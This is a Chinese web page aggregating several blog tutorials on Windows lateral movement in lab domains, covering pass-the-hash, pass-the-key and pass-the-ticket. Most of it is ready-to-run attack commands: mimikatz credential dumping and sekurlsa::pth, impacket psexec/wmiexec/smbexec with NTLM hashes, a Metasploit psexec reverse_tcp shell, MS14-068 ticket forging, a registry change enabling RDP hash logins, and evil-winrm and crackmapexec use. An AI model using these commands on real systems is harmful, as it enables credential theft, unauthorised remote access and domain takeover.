精华内容
下载资源
问答
  • 哈希传递
    2022-06-21 15:53:31

    目录

    票据传递

    哈希传递

    希传递攻击原理

    希传递攻击


    票据传递

    要想使用mimikatz的哈希传递功能,必须具有本地管理员权限,mimikatz同样提供l不需要本地管理员权限进行横向渗透测试的方法,例如票据传递PassThe Ticket,PTT。本节将通过实验分析票据传递攻击的思路,并给出防范措施

    执行以上命令后,会在当前目录下多个服务的票据文件,例如krbtgt,cifs,ldap等

    mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

    清除内存中的票据

    kerberos::purge

    将高权限的票据文件注入内存后

    Mimikatz.exe "kerberos::pott ""票据路径"

    哈希传递

    大多数渗透测试人员都听说过哈希传递(Pass The Hash)攻击。该方法通过找到与账户相关 的密码散列值(通常是 NTLM Hash)来进行攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本 地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登 录内网中的其他计算机。同 时,通过哈希传递攻击,攻击者不需要花时间破解密码散列值(进而获得密码明文)。 在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和 工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来 完成任务。在 WindowsServer2012R2及之后版 本的操作系统中,默认在内存中不会记录明文密码,因此,攻击者往往会使用工具将散列值传递到其他计算机中,进行权 限验证,实现对远程计 算机的控制。

    希传递攻击原理

    当用户需要登录某网站时,如果该网站使用明文的方式保存用户的密码,那么,一旦该网站出现安全漏洞,所有用户的明 文密码均会被泄露。由此,产生了散列值的概念。当用户设置密码时,网站服务器会对用户输入的密码进行散列加密 处理(通常使用MD5算法)散列加密算法般为单向不可逆算法。当用户登录网站时,会先对用户输入的密码进行散列加 密处理,再与数据 库中存储的散列值进行对比,如果完全相同则表示验证成功。 主流的Windows操作系统,通常会使用 NTLM Hash对访问资源的用户进行身份验证。早期 版本的 Windows操作系 统,则使用 LMHash对用户密码进行验证。但是,当密码大于等于14位 时,就无法使用 LM Hash了。从 Windows vista和 Windowsserver2008版本开始, Windows操作 系统默认禁用 LM Hash,因为在使用 NTLM Hash进行身份认 证时,不会使用明文口令,而是将明文口令通过系统API1(例如 Lsalogon User)转换成散列值。不过,攻击者在获得密 码散列值之 后,依旧可以使用哈希传递攻击来模拟用户进行认证。

    希传递攻击

    mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:hack.com /ntlm:33b89cf1674c1378a9cbf91de7189a7c"
    更多相关内容
  • 在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,...

    前言

    在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。

    0x01 哈希传递攻击

    哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。

    通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码。尤其是在 Windows Server 2012 R2 及之后的版本的操作系统中,默认在内存中不会记录明文密码,因此攻击者往往会使用工具将哈希值传递到其他计算机中进行权限验证,实现对其他远程计算机的控制。

    • 哈希传递攻击原理详解:https://www.4hou.com/posts/V0xO

    工作组环境:

    • Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。
    • Windows Vista 之后的机器,只能是 Administrator (SID为500)用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非Administrator)也不能使用哈希传递攻击,否则会提示拒绝访问。

    域环境:

    • 只有域管理员组内用户(可以是域管理员组内非 Administrator 用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域环境内任何一台机器。
    • SID 为 500 的账号登录之后以完全管理特权(“完全令牌模式”)运行所有应用程序,管理员组的非 SID 500 账户登录之后是没有过 UAC 的,所有特权都被移除。在一些计算机中,SID为500的账号即使将默认 Administrator 账号改名,也不会影响SID的值。

    0x02 Mimikatz

    假设你获取到了一台域管理员组内用户登录过的一台机器,并且获取到了这台机器的本地管理员的权限,那么你就可以使用 Mimikatz 工具同时抓取到本地管理员以及域管理员组内用户的密码 NTLM Hash 值。

    # 执行 Mimikatz 命令抓取本地密码并保存结果到 Mimikatz.log 文件中
    mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
    

    2.1 域环境

    首先使用 Mimikatz 工具获取域管理员组内用户及密码 NTLM Hash 如下:

    域环境:LUCKYSEC.CN
    域管理员组内用户:LUCKYSEC\admins
    域管理员组内用户NTLM hash值:518b98ad4178a53695dc997aa02d455c
    

    由于 Mimikatz 需要管理员权限运行,所以前提需要获取域内任意一台机器的本地管理员权限运行 CMD,然后使用 Mimikatz 对目标机器(10.10.10.10)进行 hash 传递攻击:

    # hash传递攻击 Mimikatz 命令格式:
    mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:域 /ntlm:xxxxxx"
    # 使用例子:
    mimikatz "privilege::debug" "sekurlsa::pth /user:admins /domain:LUCKYSEC.CN /ntlm:518b98ad4178a53695dc997aa02d455c"
    
    # 建立IPC$连接
    net use \\10.10.10.10
    # 列出目标机器的C盘文件
    dir \\10.10.10.10\c$    
    

    执行成功后,会弹出一个新的CMD命令行窗口,在此窗口中即可与目标机器建立 IPC$ 连接成功。

    在这里插入图片描述

    有时候 dir 后面跟 IP 地址会提示用户名或密码错误,可以通过输入目标的主机名解决此问题:

    dir \\AD-2016\c$
    

    在这里插入图片描述

    2.2 工作组环境

    首先使用 Mimikatz 工具获取域管理员组内用户及密码 NTLM Hash 如下:

    获取本地工作组管理员:Administrator
    获取本地工作组管理员密码 NTLM Hash:518b98ad4178a53695dc997aa02d455c
    

    假设目标机器(10.10.10.20)上同样存在 Administrator 密码与攻击者拿下的主机管理员密码相同,那么这两台机器的 NTLM hash 也是相同的,因此可以进行 hash 传递攻击。

    # hash传递攻击 Mimikatz 命令格式:
    mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:目标机器IP /ntlm:xxxxxx"
    
    # 使用例子:
    mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:10.10.10.20 /ntlm:518b98ad4178a53695dc997aa02d455c"
    
    # 建立IPC$连接
    net use \\10.10.10.20
    # 列出目标机器的C盘文件
    dir \\10.10.10.20\c$
    

    在这里插入图片描述

    0x03 MSF

    首先是通过常规的反弹 shell 操作到msf上,通过 run post/windows/gather/hashdump 获取到 LM:NTLM hash 值

    在这里插入图片描述

    3.1 域环境

    攻击前提条件:

    域环境:LUCKYSEC.CN
    域管理员组内用户:admins
    域管理员组内用户 LM:NTLM hash 值:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    

    hash传递攻击:

    msf6 exploit(windows/smb/psexec) > use  exploit/windows/smb/psexec
    [*] Using configured payload windows/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
    lhost => 10.10.10.2
    msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.10
    rhost => 10.10.10.10
    msf6 exploit(windows/smb/psexec) > set smbuser admins
    smbuser => admins
    msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    msf6 exploit(windows/smb/psexec) > exploit
    

    在这里插入图片描述

    3.2 工作组环境

    攻击前提条件:

    获取本地工作组管理员:Administrator
    获取本地工作组管理员密码 LM:NTLM hash 值:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    

    hash 传递攻击:

    msf6 > use  exploit/windows/smb/psexec
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
    lhost => 10.10.10.2
    msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.20
    rhost => 10.10.10.20
    msf6 exploit(windows/smb/psexec) > set smbuser Administrator
    smbuser => Administrator
    msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
    msf6 exploit(windows/smb/psexec) > exploit
    

    在这里插入图片描述

    参考文章

    • https://mp.weixin.qq.com/s/T5tJ3GkeNKmyFXyW4CEr1A
    • https://cloud.tencent.com/developer/article/1937060
    • https://www.cnblogs.com/-qing-/p/11374136.html
    展开全文
  • 哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较

    Mimikatz在本文章中会用到的命令

    privilege::debug			#提升权限
    sekurlsa::logonpasswords	#抓取密码信息
    sekurlsa::msv				#抓取LM、NTLM、值
    sekurlsa::ekeys				#抓取aes值
    

    哈希传递攻击(PTH)

    简介:

    哈希传递(Pass The Hash)攻击,该方法通过找到与账户相关的密码散列值来进行攻击,在Windows Server 2012 R2之前使用到的密码散列值是LM、NTLM,在Windows Server 2012 R2 及其版本之后使用到的密码散列值是NTLM Hash。

    在域环境中,用户登录计算机时使用的大概都是域账号,并且许多计算机在安装时会使用相同的本地管理员账户密码,因此如果计算机的本地管理员账户和密码相同的话,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。

    条件:

    有管理员的密码散列值,并且目标机器开放445端口(SMB服务)。

    进行攻击:

    1.使用mimikatz进行哈希传递攻击:

    使用mimikatz获得散列值,还得到了域名、域用户名,除此之外还需要域内主机的ip地址

    sekurlsa::msv
    

    image-20220605113851010

    在mimikatz中运行以下命令

    sekurlsa::pth /user:域用户名 /domain:域名 /ntlm:域用户名的NTLM值
    sekurlsa::pth /user:administrator /domain:god /ntlm:8c535a2d84c3b21059d667639bb89db5
    

    运行完成之后会自己跳一个cmd窗口,然后在跳出来的cmd窗口中连接任意一个域内ip地址进行连接

    net use \\192.168.52.138	#建立IPC连接
    dir \\192.168.52.138\c$		#查看连接域内ip的c盘文件夹
    

    image-20220605113631194

    使用mimikazt有一个缺点就是需要建立IPC连接,除了使用mimikatz进行哈希传递攻击外,我们还可以使用其他工具进行哈希传递攻击,下面演示impacket工具包中的两种工具,注意,这个工具包里面的工具可以使用哈希进行利用的,如果使用的是微软官方的Pstools工具包的工具是只能使用明文进行利用的。impacket工具包下载地址:https://github.com/SecureAuthCorp/impacket

    2.使用psexec进行哈希传递攻击:

    使用psexec进行哈希传递攻击所需要的参数和mimikatz中进行哈希传递攻击的参数一样,都是域名、域用户名、域内主机的ip地址

    psexec.exe -hashes :NTLM值 域名/域用户@域内ip地址
    psexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138
    

    image-20220605115944937

    该方式进行哈希传递攻击的优点是不需要建立IPC连接。

    3.使用smbexec进行哈希传递攻击:

    smbexec.exe -hashes :NTLM值 域名/域用户@域内ip地址
    smbexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138
    

    image-20220605123900521

    以上三种哈希传递攻击都是使用到445端口(SMB服务)而没有用到135端口,接下来演示445端口配合135端口进行哈希传递攻击

    4.使用wmiexec进行哈希传递攻击:

    缺点是一次只能执行一次命令,而上面三种都是可以执行很多次命令。

    wmiexec -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 "ipconfig"
    

    image-20220605124707683

    进行哈希传递攻击的时候需要注意以下两点:

    • dir命令后面要使用主机名,不能用IP,否则报错
    • 使用mimikatz进行哈希传递要具有本地管理员权限

    密钥传递攻击(PTK)

    简介:

    密钥传递攻击只能在打了kb2871997

    条件:

    打了kb2871997补丁才能任意用户都可以连接,采用 aes256 连接。

    进行攻击:

    mimikatz获取aes值

    sekurlsa::ekeys
    

    image-20220605125946693

    sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 hash
    sekurlsa::pth /user:administrator /domain:god /aes256:bd25b5ae78c10e3fcda9693cd31027d70383063a1d8c2b835c6fa1c416b79669
    

    image-20220605131823582在实际上,PTK传递比PTH传递用的少,因为PTK传递需要一个前提条件,需要域控安装KB2871997补丁的Win7/2008r2/8/2012(2019尝试也可以,并没有装补丁)。

    票据传递攻击(PTT)

    简介:

    不需要管理员权限就可以获得远程系统的访问权限,Pass The Ticket 票据传递(PTT攻击)实现「未授权」访问。

    条件:

    进行攻击:

    1.使用mimikatz进行票据传递攻击:

    因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗。

    缺点:票据是有有效期的,一般为10小时,所以如果当前主机10h之内连接过域控的话,我们可以利用该票据,但是如果超过10h,就没法利用了。

    导入票据

    sekurlsa::tickets /export
    

    image-20220605143255712

    删除票据,排除干扰

    klist purge
    

    image-20220605143620670

    导入票据

    kerberos::ptt 票据文件
    kerberos::pttC:\Users\Administrator\Desktop\mimikatz_trunk\x64\[0;3e7]-2-0-60a00000-STU1$@krbtgt-GOD.ORG.kirbi
    

    image-20220605144030499

    进行利用

    dir \\192.168.52.138\c$
    

    image-20220605144933403

    下面的两种方式由于靶机发生故障了,所以借用网上的图片。

    2.利用工具kekeo

    生成票据,导入票据

    kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c" //生成票据
    kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi //导入票据
    

    img

    查看凭证 klist

    img

    利用

    dir \192.168.3.21\c$
    dir \\OWA2010CN-God.god.org\c$
    

    3.利用漏洞ms14-068

    whoami/user 查看当前sid

    img

    我们知道mary就是域内一个普通用户

    img

    清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

    klist //查看凭证列表
    klist purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
    

    img

    利用MS14-068生成TGT数据

    ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
    MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
    

    img

    将票据注入到内存中

    ./mimikatz.exe
    kerberos::ptc TGT_mary@god.org.ccache
    exit
    

    img

    查看凭证列表。klist 查看一下,注入成功。

    img

    利用

    dir \192.168.3.21\c$
    dir \\OWA2010CN-God.god.org\c$
    

    img

    总结

    PTH和PTK需要管理员权限,其中PTK要求更为苛刻,PTK需要打了kb2871997补丁才能够使用,因此一般情况下不考虑使用PTK。而PTT利用漏洞MS14-068可以直接从普通域成员提权到域管理员权限。因此一般应该靠考虑使用MS14-068进行横向移动。

    展开全文
  • Part1 前言随着人们的安全意识的逐步加强,企业...这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......

    ad0f6f60cdb9c65e8b433077bde8140a.png

     Part1 前言 

    随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可以直接使用hash来远程登录Windows主机了。

    当前内网环境中的主机为了防范MS17-010等漏洞,也为了阻断哈希传递攻击,很多主机都安装了EDR防护、防火墙策略、杀毒软件等等,把445端口都封禁掉了,导致基于SMB服务的 hash传递没法使用。这个还是有解决办法的,Windows的远程登录方式还有很多种,比如说135端口的WMI服务、3389的RDP服务、5985端口的Winrm服务都是可以用来哈希传递的,下面分情况具体讲解一下。

     Part2 技术研究过程 

    • 虚拟机环境搭建

    为了方便演示,本地准备了一台Windows2016的虚拟机,IP地址是192.168.237.209,密码更改为P@ssw0rd

    3ed806b220dd9b1b85429d1fb77db7a0.png

    接下来使用mimikatz提取哈希值,得到NTLM哈希是e19ccf75ee54e06b06a5907af13cef42

    有的哈希传递工具需要同时填上LMHash:NTHash,如果只获取到了NThash部分,那么LMHash部分可以用32个0替代。

    如下所示的使用命令,从本地sam文件中读取密码哈希。推荐使用以下命令,尽量不要从内存中提取,因为内存中存放的可能是管理员修改密码前的哈希值,导致哈希传递不成功。提取哈希值命令如下:

    mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

    b79e26d71de68a749cf65894d03dd00d.png

    • 135端口wmi哈希传递

    WMI 全称 Windows Management Instrumentation 即 Windows 管理工具,Windows 98 以后的操作系统都支持 WMI。由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将 PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。

    首先推荐的是 impacket内网渗透套件的wmiexec.exe程序,我从github下载的是windows编译版,使用非常方便。如下所示命令,可以执行命令成功。

    wmiexec -hashes 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 Administrator@192.168.237.209

    bdeca0558367d6f2b6e8ca593b4e2a20.png

    接下来介绍另一款脚本Invoke-TheHash,使用powershell脚本编写的专门用来哈希传递的脚本,同时支持WMI、SMB的哈希传递。

    Import-Module ./Invoke-TheHash.psd1

    Invoke-WMIExec -Target 192.168.237.209 -Username Administrator -Hash 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 -Command "whoami" -verbose

    bf38e656bdf9eb5b78875fa4a08a0c2a.png

    • 445端口smb哈希传递

     1   首先推荐的是 impacket内网渗透套件的psexec.exe程序,使用方法如下:

    psexec -hashes 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 Administrator@192.168.237.209

    5ab3117ce0476c9601c8471a3e17d0f3.png

     2   使用impacket套件的mmcexec工具:

    mmcexec -hashes 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 Administrator@192.168.237.209

    3960a5407b7820d9975ff8de7110b304.png

     3   使用impacket套件的smbclient工具:

    smbclient.exe -hashes 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 Administrator@192.168.237.209

    2de7f2b0970fbc409df61e4bb2143187.png

     4   Invoke-TheHash套件

    Import-Module ./Invoke-TheHash.psd1

    Invoke-SMBExec -Target 192.168.237.209 -Username Administrator -Hash 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 -Command "whoami" -verbose

    ab3ce5999491f0365cad197973898a06.png

     5  使用Metasploit中的psexec功能哈希传递:

    use exploit/windows/smb/psexec

    set RHOST 192.168.237.209

    set SMBUser Administrator

    set SMBPass 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42

    exploit

    9690c725277c842246f4aed0691b2e81.png

    • 3389端口rdp哈希传递

    3389的哈希传递让我踩了不少坑,因为网上的一些文章写的步骤不太明确,windows低版本如win2003、win2008是不支持的。正确步骤如下:

    第一步:在服务端运行如下命令,开启目标主机的Restricted Admin Mode(0代表开启,1代表关闭):

    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

    第二步:攻击机使用mimikatz执行如下命令:

    privilege::debug

    sekurlsa::pth /user:administrator /domain:. /ntlm:e19ccf75ee54e06b06a5907af13cef42 "/run:mstsc.exe /restrictedadmin"

    接下来在弹出的“远程桌面连接”处输入服务端ip地址。

    1cb62f23c3142fb7a25396be06f09b39.png

    点击“连接”后,不需要输入用户名密码,即可登陆成功。

    8f72bbb1f9022c8650548f312bfa6b5e.png

    此外还有一个支持RDP服务哈希传递的工具,是linux系统下的,名叫FreeRDP-pth,使用挺麻烦的,因为编译特别费事,我还是使用mimikatz吧,大家感兴趣可以去编译一下。

    • 5985端口winrm哈希传递

    WinRM 是 Windows Remote Managementd(Windows 远程管理)的简称,WinRM HTTP 通过 TCP 端口 5985 进行通信,而 HTTPS(TLS)通过 TCP 端口 5986 进行通信。如果所有的机器都是在域环境下,则可以使用默认的 5985 端口,否则的话则通过 5986 端口使用 HTTPS 传输。使用 WinRM 我们可以在远程主机设置了防火墙的情况下远程管理这台服务器,因为启动 WinRM 服务后,防火墙默认会自动放行 5985 端口。Windows 远程管理服务(WinRM)适用于 Windows Server 2008 和 Windows 7 以后的操作系统并自动与其支持的操作系统一起安装,但是只有在 Windows Server 2008 以上的操作系统 WinRM 服务才会自动启动,其他都需要手动开启。

    Winrm哈希传递有几个坑,网上的各种关于winrm的哈希传递工具我都测试过,目前我本地测试成功的仅有evil-winrm及crackmapexec这两款工具可以测试成功,其它的exe版本的、python版本的工具,我本地测试各种问题,暂时不知道原因出在哪里。

    第一步,需要安装evil-winrm

    gem install evil-winrm

    第二步,执行命令如下:

    ruby evil-winrm.rb -i 192.168.237.209 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42

    e35f52e9dd3584f1e22c154265bf0cd4.png

    第2个工具就是大名鼎鼎的crackmapexec了,新版已经支持winrm哈希传递,kali linux2020中自带的cmp一运行就报错,建议大家自己重装一下。

    poetry run crackmapexec winrm 192.168.237.209 -u Administrator -H 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42 -x whoami

    53abcf5066e7cdd5a37ab711a73b8f01.png

     Part3 总结 

    1.  哈希传递工具我只列出了自己平时用着顺手的,大家有更好的工具可以微信后台给我留言。

    2.  在内网横向中,经常会遇到各种各样的问题,有的特定环境下,只有一两款工具能用,多收集整理一下很有必要。

    3.  将博客搬迁至csdn,后续微信公众号文章会及时同步至csdn博客,敬请关注。

    170a59bf473b2d7883b7b7559e49f344.png

    专注于网络安全技术分享,包括红队、蓝队、日常渗透测试、安全体系建设等

    每周一篇,99%原创,敬请关注

    往期精彩回顾

    第14篇:Struts2框架下Log4j2漏洞检测方法分析与总结

    第13篇:coldfusion反序列化过waf改exp拿靶标的艰难过程

    第12篇:给任意java程序挂Socks5代理方法

    第11篇:盲猜包体对上传漏洞的艰难利用过程

    第10篇:IIS短文件名猜解在拿权限中的巧用

    第9篇:Shiro反序列化数据包解密及蓝队分析工具,提供下载

    第8篇:Oracle注入漏洞绕waf的新语句

    第7篇:MS12-020蓝屏漏洞在实战中的巧用

    第6篇:Weblogic反序列化攻击不依赖日志溯源攻击时间

    第5篇:Shiro Padding Oracle无key的艰难实战利用过程

    第4篇:jsp型webshell被删情况下如何溯源攻击时间

    第3篇:银行Java站SSRF"组合洞"打法造成的严重危害

    第2篇:区分Spring与Struts2框架的几种新方法

    第1篇:weblogic9.x在JDK1.5下T3反序列化漏洞利用方法

    展开全文
  • 哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。 因此...
  • 哈希传递攻击

    2021-06-30 19:56:53
    哈希传递概念散列值 概念 哈希传递通过找到与账户相关的密码散列值(NTLM Hash)来攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,如果计算机的本地...
  • 在这种情况下,称为Pass The Hash(传递哈希)或Hash Injection(哈希注入)的技术被广泛应用,使审核员成为计算机上的管理员。 2. NTLM协议与身份验证 NTLM协议是在Microsoft环境中使用的一种身份验证协议,特别是...
  • 哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
  • 1、哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式。 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Windows Server 2012 R2及...
  • 内网横传之哈希传递(Pass The Hash)

    千次阅读 2021-11-25 22:21:41
    本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
  • 该项目是一个C#工具,用于在用户命名模拟的本地命名管道上使用哈希传递进行身份验证。 有一个博客文章进行解释:SharpNamedPipePTH此项目是一个C#工具,用于在本地命名管道上使用哈希传递进行身份验证,以进行用户...
  • 内网渗透测试小Demo-哈希传递攻击

    千次阅读 2021-11-26 22:41:11
    文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便...
  • 使用mimikatz利用哈希传递获取域控权限 靶机 window server 2012 IP 192.168.1.22 攻击机 window7 IP 192.168.1.34 (1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用...
  • 域渗透 1....sekurlsa::logonpasswords//猕猴桃抓取密码 仅仅是这样,我们是无法做到访问域控的,这个时候我们就需要用到哈希传递 在猕猴桃内: sekurlsa::pth /user:administrator /domain:"zkaq....
  • 哈希传递攻击(Pass-the-Hash)

    千次阅读 2019-12-25 22:42:26
    目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享...
  • 白盒喷枪创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞漏洞描述基于注册表单的二阶基于盲布尔的sql注入,如果为true,则会导致users_logs,所有日志都将显示,否则为空哈希中的管理员用户名和密码无法破解,...
  • 哈希传递攻击/黄金白银票据

    千次阅读 2021-09-17 14:03:14
    Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash值的情况下能成功;②哈希传递会受到...
  • 哈希传递(PTH)攻击利用 环境:kali &win8 privilege::debug sekurlsa::logonpasswords win8中运行: 网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃 sekurlsa::pth /user:administrator ...
  • 目录 文章目录 目录 NTLM 网络认证 认证流程 哈希传递攻击 NTLM 网络认证 认证流程 第一步:客户端向服务器发送用户信息(用户名等)。 第二步:服务端收到请求,在本地查找到用户对应的NTLM Hash,生成16位随机数...
  • hashpass-android hashpass 实现与 Stephan Boyer 的 Chrome 插件 ( ) 完全兼容。
  • mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz ...
  • Mimikatz下载地址:链接:...:pth /user:administrator /d omain:IP地址 /ntlm:2cefb09dda6d6f9becfa3c0f56c3dad7 弹出一个cmd窗口 执行 dir \\192.168.52.141\c$ 执行成功 总结 以上就是pth简单利用的哈希传递
  • 内网渗透哈希传递攻击

    千次阅读 2019-12-18 11:58:23
    条件:获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着,可利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和...
  • kali密码攻击之——哈希传递攻击

    千次阅读 2017-04-22 20:10:51
    passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在...
  • (1)管理员运行 (2)必须输入 ...(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证 sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6
  • 哈希传递攻击(Pass-the-Hash,PtH)

    千次阅读 2020-01-11 22:52:11
    哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997...
  • 使用hash传递模块(passing the hash) msf5 > use exploit / windows / smb / psexec msf5 exploit ( windows / smb / psexec ) > options set rhost 192.168 .179 .132 set SMBUser ou set SMBPass aad...
  • 成功获得远程系统的访问权限~ailx10:windows系统密码获取分析和防范目标机器的环境(假定的受害者机器)域信息:hackbiji.top (黑客笔记)域内用户:ailx00 密码:WoShi@Ailx10 (未知信息)哈希:8c0a2bd6****790....
  • 『主要内容』主要介绍在后***测试阶段如何对Windows操作系统进行哈希传递***(Hash-Pass-Attack)。-------------------------------------------菜鸟起飞系列-------------------------------------...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 129,039
精华内容 51,615
关键字:

哈希传递

友情链接: tuxiangzengqiang.zip